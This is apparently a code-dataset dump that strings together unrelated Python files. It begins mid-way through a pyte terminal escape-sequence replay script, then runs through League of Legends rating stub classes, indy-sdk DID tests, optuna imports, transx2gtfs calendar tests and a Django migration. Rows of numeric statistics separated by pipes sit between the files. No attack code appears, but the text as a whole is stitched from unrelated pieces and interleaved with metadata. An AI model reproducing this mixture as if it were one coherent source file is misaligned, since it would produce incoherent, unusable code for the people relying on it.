1b[40m\x1b[C\x1b[37m\x1b[40mto\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mscale\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mthose\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mmountains.\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[24;78H\x1b[6;74H\x1b[?25h\x1b[?0c\x1b[?25l\x1b[?1c\x1b[H\x1b[K\x1b[2d\x1b[A\x1b[37m\x1b[40mYou\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mneed\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mspecial\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mequipment\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mto\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mscale\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mthose\x1b[0;10m\x1b[39;49
m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mmountains.\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[24;78H\x1b[6;74H\x1b[?25h\x1b[?0c\x1b[?25l\x1b[?1c\x1b[H\x1b[K\x1b[2d\x1b[A\x1b[37m\x1b[40mA\x1b[6;74H\x1b[33m\x1b[40m.\x1b[7d\x08\x1b[0;10;1m\x1b[30m\x1b[40m@\x1b[8;72H\x1b[0;10m\x1b[33m\x1b[40m.\x1b[9d\x1b[0;10;1m\x1b[30m\x1b[40m^\x1b[37m\x1b[40m^^\x1b[H\x1b[C\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mroad.\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[24;78H\x1b[7;74H\x1b[?25h\x1b[?0c\x1b[?25l\x1b[?1c\x1b[H\x1b[K\x1b[2d\x1b[A\x1b[37m\x1b[40mYou\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mneed\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mspecial\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mequipment\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mto\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mscale\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mthose\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mmountains.\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[24;78H\x1b[7;74H\x1b[?25h\x1b[?0c\x1b[?25l\x1b[?1c\x1b[H\x1b[K\x1b[2d\x1b[A\x1b[37m\x1b[40mA\x1b[7;74H\x1b[33m\x1b[40m.\x1b[8d\x08\x1b[0;10;1m\x1b[30m\x1b[40m@\x1b[9;72H\x1b[0;10m\x1b[33m\x1b[40m~\x1b[10d\x1b[0;10;1m\x1b[30m\x1b[40m^\x1b[H\x1b[C\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mroad.\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[24;78H\x1b[8;74H\x1b[?25h\x1b[?0c\x1b[?25l\x1b[?1c\x1b[H\x1b[K\x1b[2d\x1b[A\x1b[37m\x1b[40mA\x1b[7;71H\x1b[0;10;1m\x1b[30m\x1b[40m^\x1b[8d\x08\x1b[0;10m\x1b[33m\x1b[40m..\x1b[0;10;1m\x1b[30m\x1b[40m@\x1b[0;10m\x1b[33m\x1b[40m.\x1b[9;71H.\x1b[10d\x1b[32m\x1b[40m&\x1b[0;10;1m\x1b[30m\x1b[40m^^\x1b[H\x1b[C\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mroad.\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[24;78H\x1b[8;73H\x1b[?25h\x1b[?0c\x1b[?25l\x1b[?1c\x1b[H\x1b[K\x1b[2d\x1b[A\x1b[37m\x1b[40mA\x1b[6;71H\x1b[0;10;1m\x1b[37m\x1b[40m^\x1b[7d\x08\x08\x1b[30m\x1b[40m^\x1b[8d\x08^\x1b[0;10m\x1b
[33m\x1b[40m.\x1b[0;10;1m\x1b[30m\x1b[40m@\x1b[0;10m\x1b[33m\x1b[40m.\x1b[9;70H.\x1b[10d\x1b[32m\x1b[40m&\x1b[H\x1b[C\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mroad.\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[24;78H\x1b[8;72H\x1b[?25h\x1b[?0c"""
if __name__ == "__main__":
    # Replay the captured escape-sequence blob through a DebugStream that is
    # attached to an 80x24 screen, so each parsed event gets reported.
    debug_stream = pyte.DebugStream()
    debug_screen = pyte.Screen(80, 24)
    debug_stream.attach(debug_screen)
    debug_stream.feed(blob)
| 160.741935
| 4,267
| 0.707606
| 1,208
| 4,983
| 2.907285
| 0.113411
| 0.134966
| 0.202449
| 0.133827
| 0.838269
| 0.833713
| 0.817198
| 0.807232
| 0.807232
| 0.774203
| 0
| 0.305261
| 0.034919
| 4,983
| 30
| 4,268
| 166.1
| 0.425036
| 0.085089
| 0
| 0
| 0
| 0.1
| 0.943559
| 0.92873
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.3
| 0
| 0.3
| 0.1
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
83d758be43f090a4ac18b2de134434fe27cd7e1a
| 6,821
|
py
|
Python
|
loldib/getratings/models/NA/na_katarina/na_katarina_jng.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_katarina/na_katarina_jng.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_katarina/na_katarina_jng.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from getratings.models.ratings import Ratings
# Empty per-matchup rating model classes for NA-region Katarina in the jungle
# role: one Ratings subclass per opposing champion, adding no behaviour of
# their own. Presumably the subclasses are looked up by name elsewhere in the
# getratings package — TODO confirm against callers.
class NA_Katarina_Jng_Aatrox(Ratings):
    pass
class NA_Katarina_Jng_Ahri(Ratings):
    pass
class NA_Katarina_Jng_Akali(Ratings):
    pass
class NA_Katarina_Jng_Alistar(Ratings):
    pass
class NA_Katarina_Jng_Amumu(Ratings):
    pass
class NA_Katarina_Jng_Anivia(Ratings):
    pass
class NA_Katarina_Jng_Annie(Ratings):
    pass
class NA_Katarina_Jng_Ashe(Ratings):
    pass
class NA_Katarina_Jng_AurelionSol(Ratings):
    pass
class NA_Katarina_Jng_Azir(Ratings):
    pass
class NA_Katarina_Jng_Bard(Ratings):
    pass
class NA_Katarina_Jng_Blitzcrank(Ratings):
    pass
class NA_Katarina_Jng_Brand(Ratings):
    pass
class NA_Katarina_Jng_Braum(Ratings):
    pass
class NA_Katarina_Jng_Caitlyn(Ratings):
    pass
class NA_Katarina_Jng_Camille(Ratings):
    pass
class NA_Katarina_Jng_Cassiopeia(Ratings):
    pass
class NA_Katarina_Jng_Chogath(Ratings):
    pass
class NA_Katarina_Jng_Corki(Ratings):
    pass
class NA_Katarina_Jng_Darius(Ratings):
    pass
class NA_Katarina_Jng_Diana(Ratings):
    pass
class NA_Katarina_Jng_Draven(Ratings):
    pass
class NA_Katarina_Jng_DrMundo(Ratings):
    pass
class NA_Katarina_Jng_Ekko(Ratings):
    pass
class NA_Katarina_Jng_Elise(Ratings):
    pass
class NA_Katarina_Jng_Evelynn(Ratings):
    pass
class NA_Katarina_Jng_Ezreal(Ratings):
    pass
class NA_Katarina_Jng_Fiddlesticks(Ratings):
    pass
class NA_Katarina_Jng_Fiora(Ratings):
    pass
class NA_Katarina_Jng_Fizz(Ratings):
    pass
class NA_Katarina_Jng_Galio(Ratings):
    pass
class NA_Katarina_Jng_Gangplank(Ratings):
    pass
class NA_Katarina_Jng_Garen(Ratings):
    pass
class NA_Katarina_Jng_Gnar(Ratings):
    pass
class NA_Katarina_Jng_Gragas(Ratings):
    pass
class NA_Katarina_Jng_Graves(Ratings):
    pass
class NA_Katarina_Jng_Hecarim(Ratings):
    pass
class NA_Katarina_Jng_Heimerdinger(Ratings):
    pass
class NA_Katarina_Jng_Illaoi(Ratings):
    pass
class NA_Katarina_Jng_Irelia(Ratings):
    pass
class NA_Katarina_Jng_Ivern(Ratings):
    pass
class NA_Katarina_Jng_Janna(Ratings):
    pass
class NA_Katarina_Jng_JarvanIV(Ratings):
    pass
class NA_Katarina_Jng_Jax(Ratings):
    pass
class NA_Katarina_Jng_Jayce(Ratings):
    pass
class NA_Katarina_Jng_Jhin(Ratings):
    pass
class NA_Katarina_Jng_Jinx(Ratings):
    pass
class NA_Katarina_Jng_Kalista(Ratings):
    pass
class NA_Katarina_Jng_Karma(Ratings):
    pass
class NA_Katarina_Jng_Karthus(Ratings):
    pass
class NA_Katarina_Jng_Kassadin(Ratings):
    pass
class NA_Katarina_Jng_Katarina(Ratings):
    pass
class NA_Katarina_Jng_Kayle(Ratings):
    pass
class NA_Katarina_Jng_Kayn(Ratings):
    pass
class NA_Katarina_Jng_Kennen(Ratings):
    pass
class NA_Katarina_Jng_Khazix(Ratings):
    pass
class NA_Katarina_Jng_Kindred(Ratings):
    pass
class NA_Katarina_Jng_Kled(Ratings):
    pass
class NA_Katarina_Jng_KogMaw(Ratings):
    pass
class NA_Katarina_Jng_Leblanc(Ratings):
    pass
class NA_Katarina_Jng_LeeSin(Ratings):
    pass
class NA_Katarina_Jng_Leona(Ratings):
    pass
class NA_Katarina_Jng_Lissandra(Ratings):
    pass
class NA_Katarina_Jng_Lucian(Ratings):
    pass
class NA_Katarina_Jng_Lulu(Ratings):
    pass
class NA_Katarina_Jng_Lux(Ratings):
    pass
class NA_Katarina_Jng_Malphite(Ratings):
    pass
class NA_Katarina_Jng_Malzahar(Ratings):
    pass
class NA_Katarina_Jng_Maokai(Ratings):
    pass
class NA_Katarina_Jng_MasterYi(Ratings):
    pass
class NA_Katarina_Jng_MissFortune(Ratings):
    pass
class NA_Katarina_Jng_MonkeyKing(Ratings):
    pass
class NA_Katarina_Jng_Mordekaiser(Ratings):
    pass
class NA_Katarina_Jng_Morgana(Ratings):
    pass
class NA_Katarina_Jng_Nami(Ratings):
    pass
class NA_Katarina_Jng_Nasus(Ratings):
    pass
class NA_Katarina_Jng_Nautilus(Ratings):
    pass
class NA_Katarina_Jng_Nidalee(Ratings):
    pass
class NA_Katarina_Jng_Nocturne(Ratings):
    pass
class NA_Katarina_Jng_Nunu(Ratings):
    pass
class NA_Katarina_Jng_Olaf(Ratings):
    pass
class NA_Katarina_Jng_Orianna(Ratings):
    pass
class NA_Katarina_Jng_Ornn(Ratings):
    pass
class NA_Katarina_Jng_Pantheon(Ratings):
    pass
class NA_Katarina_Jng_Poppy(Ratings):
    pass
class NA_Katarina_Jng_Quinn(Ratings):
    pass
class NA_Katarina_Jng_Rakan(Ratings):
    pass
class NA_Katarina_Jng_Rammus(Ratings):
    pass
class NA_Katarina_Jng_RekSai(Ratings):
    pass
class NA_Katarina_Jng_Renekton(Ratings):
    pass
class NA_Katarina_Jng_Rengar(Ratings):
    pass
class NA_Katarina_Jng_Riven(Ratings):
    pass
class NA_Katarina_Jng_Rumble(Ratings):
    pass
class NA_Katarina_Jng_Ryze(Ratings):
    pass
class NA_Katarina_Jng_Sejuani(Ratings):
    pass
class NA_Katarina_Jng_Shaco(Ratings):
    pass
class NA_Katarina_Jng_Shen(Ratings):
    pass
class NA_Katarina_Jng_Shyvana(Ratings):
    pass
class NA_Katarina_Jng_Singed(Ratings):
    pass
class NA_Katarina_Jng_Sion(Ratings):
    pass
class NA_Katarina_Jng_Sivir(Ratings):
    pass
class NA_Katarina_Jng_Skarner(Ratings):
    pass
class NA_Katarina_Jng_Sona(Ratings):
    pass
class NA_Katarina_Jng_Soraka(Ratings):
    pass
class NA_Katarina_Jng_Swain(Ratings):
    pass
class NA_Katarina_Jng_Syndra(Ratings):
    pass
class NA_Katarina_Jng_TahmKench(Ratings):
    pass
class NA_Katarina_Jng_Taliyah(Ratings):
    pass
class NA_Katarina_Jng_Talon(Ratings):
    pass
class NA_Katarina_Jng_Taric(Ratings):
    pass
class NA_Katarina_Jng_Teemo(Ratings):
    pass
class NA_Katarina_Jng_Thresh(Ratings):
    pass
class NA_Katarina_Jng_Tristana(Ratings):
    pass
class NA_Katarina_Jng_Trundle(Ratings):
    pass
class NA_Katarina_Jng_Tryndamere(Ratings):
    pass
class NA_Katarina_Jng_TwistedFate(Ratings):
    pass
class NA_Katarina_Jng_Twitch(Ratings):
    pass
class NA_Katarina_Jng_Udyr(Ratings):
    pass
class NA_Katarina_Jng_Urgot(Ratings):
    pass
class NA_Katarina_Jng_Varus(Ratings):
    pass
class NA_Katarina_Jng_Vayne(Ratings):
    pass
class NA_Katarina_Jng_Veigar(Ratings):
    pass
class NA_Katarina_Jng_Velkoz(Ratings):
    pass
class NA_Katarina_Jng_Vi(Ratings):
    pass
class NA_Katarina_Jng_Viktor(Ratings):
    pass
class NA_Katarina_Jng_Vladimir(Ratings):
    pass
class NA_Katarina_Jng_Volibear(Ratings):
    pass
class NA_Katarina_Jng_Warwick(Ratings):
    pass
class NA_Katarina_Jng_Xayah(Ratings):
    pass
class NA_Katarina_Jng_Xerath(Ratings):
    pass
class NA_Katarina_Jng_XinZhao(Ratings):
    pass
class NA_Katarina_Jng_Yasuo(Ratings):
    pass
class NA_Katarina_Jng_Yorick(Ratings):
    pass
class NA_Katarina_Jng_Zac(Ratings):
    pass
class NA_Katarina_Jng_Zed(Ratings):
    pass
class NA_Katarina_Jng_Ziggs(Ratings):
    pass
class NA_Katarina_Jng_Zilean(Ratings):
    pass
class NA_Katarina_Jng_Zyra(Ratings):
    pass
| 16.357314
| 46
| 0.776133
| 972
| 6,821
| 5.020576
| 0.151235
| 0.197951
| 0.42418
| 0.509016
| 0.814139
| 0.814139
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162879
| 6,821
| 416
| 47
| 16.396635
| 0.854641
| 0
| 0
| 0.498195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.498195
| 0.00361
| 0
| 0.501805
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
83e5562155ab53efab62c578a3de9b14c019bb85
| 477
|
py
|
Python
|
wrappers/python/tests/did/test_set_did_metadata.py
|
sklump/indy-sdk
|
ee05a89ddf60b42f7483bebf2d89a936e12730df
|
[
"Apache-2.0"
] | 636
|
2017-05-25T07:45:43.000Z
|
2022-03-23T22:30:34.000Z
|
wrappers/python/tests/did/test_set_did_metadata.py
|
Nick-1979/indy-sdk
|
e5f812e14962f0d51cf96f843033754ff841ce30
|
[
"Apache-2.0"
] | 731
|
2017-05-29T07:15:08.000Z
|
2022-03-31T07:55:58.000Z
|
wrappers/python/tests/did/test_set_did_metadata.py
|
Nick-1979/indy-sdk
|
e5f812e14962f0d51cf96f843033754ff841ce30
|
[
"Apache-2.0"
] | 904
|
2017-05-25T07:45:49.000Z
|
2022-03-31T07:43:31.000Z
|
import pytest
from indy import did
@pytest.mark.asyncio
async def test_set_did_metadata_works(wallet_handle, metadata):
    """Metadata can be attached to a freshly created DID."""
    new_did, _verkey = await did.create_and_store_my_did(wallet_handle, "{}")
    await did.set_did_metadata(wallet_handle, new_did, metadata)
@pytest.mark.asyncio
async def test_set_did_metadata_works_for_empty_string(wallet_handle):
    """An empty string is accepted as DID metadata."""
    new_did, _verkey = await did.create_and_store_my_did(wallet_handle, "{}")
    await did.set_did_metadata(wallet_handle, new_did, '')
| 29.8125
| 70
| 0.779874
| 71
| 477
| 4.746479
| 0.323944
| 0.21365
| 0.166172
| 0.130564
| 0.753709
| 0.753709
| 0.753709
| 0.753709
| 0.753709
| 0.753709
| 0
| 0
| 0.1174
| 477
| 15
| 71
| 31.8
| 0.800475
| 0
| 0
| 0.4
| 0
| 0
| 0.008386
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.2
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
83ef585b18e8c1bd48b1a24a50ed08061826bd7b
| 278
|
py
|
Python
|
optuna_core/trial/__init__.py
|
hvy/optuna-core
|
be9df49424aa4022cfcec7d9423768cc39c73ae6
|
[
"MIT"
] | 1
|
2020-10-09T02:35:25.000Z
|
2020-10-09T02:35:25.000Z
|
optuna_core/trial/__init__.py
|
hvy/optuna-core
|
be9df49424aa4022cfcec7d9423768cc39c73ae6
|
[
"MIT"
] | null | null | null |
optuna_core/trial/__init__.py
|
hvy/optuna-core
|
be9df49424aa4022cfcec7d9423768cc39c73ae6
|
[
"MIT"
] | null | null | null |
from optuna_core.trial._base import BaseTrial # NOQA
from optuna_core.trial._frozen import create_trial # NOQA
from optuna_core.trial._frozen import FrozenTrial # NOQA
from optuna_core.trial._state import TrialState # NOQA
from optuna_core.trial._trial import Trial # NOQA
| 46.333333
| 58
| 0.820144
| 41
| 278
| 5.292683
| 0.317073
| 0.230415
| 0.322581
| 0.437788
| 0.534562
| 0.322581
| 0.322581
| 0
| 0
| 0
| 0
| 0
| 0.125899
| 278
| 5
| 59
| 55.6
| 0.893004
| 0.086331
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
f7c08425bcf40b7e6ab4bb7ffe5fae3db2db9471
| 6,484
|
py
|
Python
|
transx2gtfs/tests/test_calendar.py
|
aclong/transx2gtfs
|
36d5b87d425c5dd299a3fbc7e973aff91876c2ca
|
[
"MIT"
] | 5
|
2020-02-10T19:51:12.000Z
|
2021-03-06T23:52:50.000Z
|
transx2gtfs/tests/test_calendar.py
|
aclong/transx2gtfs
|
36d5b87d425c5dd299a3fbc7e973aff91876c2ca
|
[
"MIT"
] | 23
|
2020-01-24T13:09:56.000Z
|
2021-10-05T13:45:50.000Z
|
transx2gtfs/tests/test_calendar.py
|
aclong/transx2gtfs
|
36d5b87d425c5dd299a3fbc7e973aff91876c2ca
|
[
"MIT"
] | 6
|
2020-01-28T20:46:46.000Z
|
2021-10-13T14:32:04.000Z
|
from transx2gtfs.data import get_path
import pytest
@pytest.fixture
def test_tfl_data():
    """Path to the TfL-format TransXChange test file."""
    data_path = get_path('test_tfl_format')
    return data_path
@pytest.fixture
def test_txc21_data():
    """Path to the TransXChange 2.1-format test file."""
    data_path = get_path('test_txc21_format')
    return data_path
@pytest.fixture
def test_naptan_data():
    """Path to the NaPTAN stops test file."""
    data_path = get_path('naptan_stops')
    return data_path
def test_calendar_weekday_info_tfl(test_tfl_data):
    """Operative-days info parsed from the TfL test file is the text 'Weekend'."""
    import untangle
    from transx2gtfs.calendar import get_service_operative_days_info

    parsed = untangle.parse(test_tfl_data)
    days_info = get_service_operative_days_info(parsed)

    # Result is a plain-text label ...
    assert isinstance(days_info, str)
    # ... and for this fixture it should be 'Weekend'
    assert days_info == 'Weekend'
def test_calendar_weekday_info_txc21(test_txc21_data):
    """Operative-days info parsed from the TXC 2.1 test file is the text 'Weekend'."""
    import untangle
    from transx2gtfs.calendar import get_service_operative_days_info

    parsed = untangle.parse(test_txc21_data)
    days_info = get_service_operative_days_info(parsed)

    # Result is a plain-text label ...
    assert isinstance(days_info, str)
    # ... and for this fixture it should be 'Weekend'
    assert days_info == 'Weekend'
def test_calendar_dataframe_tfl(test_tfl_data):
    """Each vehicle journey in the TfL test file maps to a one-hot weekday row."""
    import untangle
    from pandas import DataFrame
    from pandas.testing import assert_frame_equal
    from transx2gtfs.calendar import get_weekday_info, parse_day_range

    parsed = untangle.parse(test_tfl_data)
    journeys = parsed.TransXChange.VehicleJourneys.VehicleJourney

    # Alphabetical column order matches what parse_day_range produces.
    weekday_cols = ('friday', 'monday', 'saturday', 'sunday',
                    'thursday', 'tuesday', 'wednesday')

    def _expected_row(day_name):
        # One-hot row: 1.0 for the operative day, 0.0 for the rest.
        return DataFrame({col: (1.0 if col == day_name.lower() else 0.0)
                          for col in weekday_cols}, index=[0])

    for journey in journeys:
        # Weekday operation info from the VehicleJourney element
        weekdays = get_weekday_info(journey)
        assert isinstance(weekdays, str)
        assert weekdays in ('Sunday', 'Saturday')
        # A single calendar row should match the one-hot expectation
        assert_frame_equal(parse_day_range(weekdays), _expected_row(weekdays))
def test_calendar_dataframe_txc21(test_txc21_data):
    """Each vehicle journey in the TXC 2.1 test file maps to a one-hot weekday row."""
    import untangle
    from pandas import DataFrame
    from pandas.testing import assert_frame_equal
    from transx2gtfs.calendar import get_weekday_info, parse_day_range

    parsed = untangle.parse(test_txc21_data)
    journeys = parsed.TransXChange.VehicleJourneys.VehicleJourney

    # Alphabetical column order matches what parse_day_range produces.
    weekday_cols = ('friday', 'monday', 'saturday', 'sunday',
                    'thursday', 'tuesday', 'wednesday')

    def _expected_row(day_name):
        # One-hot row: 1.0 for the operative day, 0.0 for the rest.
        return DataFrame({col: (1.0 if col == day_name.lower() else 0.0)
                          for col in weekday_cols}, index=[0])

    for journey in journeys:
        # Weekday operation info from the VehicleJourney element
        weekdays = get_weekday_info(journey)
        assert isinstance(weekdays, str)
        assert weekdays in ('Sunday', 'Saturday')
        # A single calendar row should match the one-hot expectation
        assert_frame_equal(parse_day_range(weekdays), _expected_row(weekdays))
def test_get_calendar_tfl(test_tfl_data):
    """GTFS calendar built from the TfL data has one Sunday and one Saturday service."""
    import numpy as np
    import untangle
    from pandas import DataFrame
    from pandas.testing import assert_frame_equal
    from transx2gtfs.calendar import get_calendar
    from transx2gtfs.transxchange import get_gtfs_info

    parsed = untangle.parse(test_tfl_data)

    # Intermediate GTFS info table
    gtfs_info = get_gtfs_info(parsed)
    assert isinstance(gtfs_info, DataFrame)

    # Calendar derived from the info table
    gtfs_calendar = get_calendar(gtfs_info)
    assert isinstance(gtfs_calendar, DataFrame)

    # Row 0 is the Sunday service, row 1 the Saturday service.
    day_flags = {
        'monday': (0, 0), 'tuesday': (0, 0), 'wednesday': (0, 0),
        'thursday': (0, 0), 'friday': (0, 0),
        'saturday': (0, 1), 'sunday': (1, 0),
    }
    expected = DataFrame({
        'service_id': ["1-HAM-_-y05-2675925_20190713_20190714_Sunday",
                       "1-HAM-_-y05-2675925_20190713_20190714_Saturday"],
        **{day: np.int64(list(flags)) for day, flags in day_flags.items()},
        'start_date': ["20190713", "20190713"],
        'end_date': ["20190714", "20190714"],
    }, index=[0, 1])

    try:
        assert_frame_equal(gtfs_calendar, expected)
    except AssertionError as err:
        # Tolerate int32 vs int64 column dtype differences (platform dependent)
        if '''Attribute "dtype" are different''' not in str(err):
            raise err
def test_get_calendar_txc21(test_txc21_data):
    """GTFS calendar built from the TXC 2.1 test feed matches the expected frame.

    Dtype checking is relaxed (int32 vs int64 is platform-dependent) while
    values, index, and column labels are still compared strictly.
    """
    from transx2gtfs.calendar import get_calendar
    from transx2gtfs.transxchange import get_gtfs_info
    from pandas import DataFrame
    from pandas.testing import assert_frame_equal
    import numpy as np
    import untangle
    data = untangle.parse(test_txc21_data)
    # Get gtfs info
    gtfs_info = get_gtfs_info(data)
    assert isinstance(gtfs_info, DataFrame)
    # Get GTFS calendar
    gtfs_calendar = get_calendar(gtfs_info)
    assert isinstance(gtfs_calendar, DataFrame)
    correct_frame = DataFrame({
        'service_id': ["99-PIC-B-y05-4_20200201_20200202_Sunday",
                       "99-PIC-B-y05-4_20200201_20200202_Saturday"],
        'monday': np.int64([0, 0]), 'tuesday': np.int64([0, 0]), 'wednesday': np.int64([0, 0]),
        'thursday': np.int64([0, 0]), 'friday': np.int64([0, 0]),
        'saturday': np.int64([0, 1]), 'sunday': np.int64([1, 0]),
        'start_date': ["20200201", "20200201"],
        'end_date': ["20200202", "20200202"],
    }, index=[0, 1])
    # check_dtype=False tolerates the int32/int64 difference directly instead of
    # string-matching the AssertionError message, which previously also masked
    # genuine value mismatches whenever a dtype mismatch raised first.
    assert_frame_equal(gtfs_calendar, correct_frame, check_dtype=False)
| 33.081633
| 95
| 0.637724
| 791
| 6,484
| 5.013906
| 0.1378
| 0.017146
| 0.024206
| 0.022693
| 0.934695
| 0.901664
| 0.886536
| 0.873424
| 0.871407
| 0.849218
| 0
| 0.065754
| 0.256477
| 6,484
| 195
| 96
| 33.251282
| 0.756897
| 0.092998
| 0
| 0.801653
| 0
| 0
| 0.130761
| 0.02902
| 0
| 0
| 0
| 0
| 0.181818
| 1
| 0.07438
| false
| 0.016529
| 0.214876
| 0.024793
| 0.31405
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f7e4e6dc5d2090fe3d9bf6fc59fa418373f48a37
| 2,848
|
py
|
Python
|
TWLight/resources/migrations/0025_auto_20170113_1614.py
|
saloniig/TWLight
|
cd92e690b79676299d95394abf9e66885eac9d73
|
[
"MIT"
] | 2
|
2020-01-17T09:14:55.000Z
|
2020-01-17T09:15:20.000Z
|
TWLight/resources/migrations/0025_auto_20170113_1614.py
|
saloniig/TWLight
|
cd92e690b79676299d95394abf9e66885eac9d73
|
[
"MIT"
] | 11
|
2022-03-18T18:05:40.000Z
|
2022-03-18T18:06:04.000Z
|
TWLight/resources/migrations/0025_auto_20170113_1614.py
|
saloniig/TWLight
|
cd92e690b79676299d95394abf9e66885eac9d73
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from django.db import migrations, models

# Help text shared verbatim by every localized description field below.
# It must stay byte-identical to the text originally recorded in this
# migration, so do not reflow or "fix" the wording.
DESCRIPTION_HELP_TEXT = (
    "Optional description of this partner's offerings. You can enter HTML and "
    "it should render properly - if it does not, the developer forgot a | safe "
    "filter in the template. Whatever you enter here will also be automatically "
    "copied over to the description field for *your current language*, so you "
    "do not need to also fill that out."
)


def _description_field():
    """Return a fresh TextField as used by every description_* column."""
    return models.TextField(
        help_text=DESCRIPTION_HELP_TEXT,
        null=True,
        blank=True,
    )


class Migration(migrations.Migration):
    """Align the partner description fields (base + translations) and languages M2M."""

    dependencies = [("resources", "0024_auto_20170113_1606")]

    operations = [
        # One AlterField per localized description column; each gets its own
        # field instance from the factory (migration fields must not be shared).
        migrations.AlterField(
            model_name="partner",
            name="description",
            field=_description_field(),
        ),
        migrations.AlterField(
            model_name="partner",
            name="description_en",
            field=_description_field(),
        ),
        migrations.AlterField(
            model_name="partner",
            name="description_fi",
            field=_description_field(),
        ),
        migrations.AlterField(
            model_name="partner",
            name="description_fr",
            field=_description_field(),
        ),
        migrations.AlterField(
            model_name="partner",
            name="languages",
            field=models.ManyToManyField(
                help_text="Select all languages in which this partner publishes content.",
                to="resources.Language",
                null=True,
                blank=True,
            ),
        ),
    ]
| 48.271186
| 358
| 0.61552
| 343
| 2,848
| 5.06414
| 0.244898
| 0.057571
| 0.071963
| 0.083477
| 0.847438
| 0.847438
| 0.847438
| 0.818077
| 0.818077
| 0.818077
| 0
| 0.008709
| 0.314607
| 2,848
| 58
| 359
| 49.103448
| 0.881148
| 0.007374
| 0
| 0.745098
| 0
| 0.078431
| 0.539469
| 0.008142
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.019608
| 0
| 0.078431
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
